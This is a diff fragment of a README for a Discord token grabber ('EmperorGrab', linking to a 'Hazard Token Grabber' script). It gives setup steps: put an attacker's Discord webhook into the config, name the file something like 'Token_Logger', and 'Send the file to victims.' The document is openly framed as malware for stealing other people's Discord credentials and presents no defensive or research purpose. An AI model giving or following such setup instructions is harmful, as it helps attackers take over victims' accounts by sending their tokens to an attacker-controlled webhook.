EmperorTLM/EmperorGrab/README.md

 2. Open up [hazard.py](https://github.com/Rdmo1/Hazard-Token-Grabber-V3/blob/master/hazard.py) with notepad or some other editor
 3. Locate the config at the top of the file and Replace "WEBHOOK_HERE" with your [discord webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)
 4. and save it
-5. A Window will open prompting for a name.
-Put something in such as "Token_Logger" (You can always rename the file later)
+5. for the file name , Put something in such as "Token_Logger" (You can always rename the file later)
 6. Send the file to victims. 😈

 ## <a id="config"></a>⚙ 〢 Config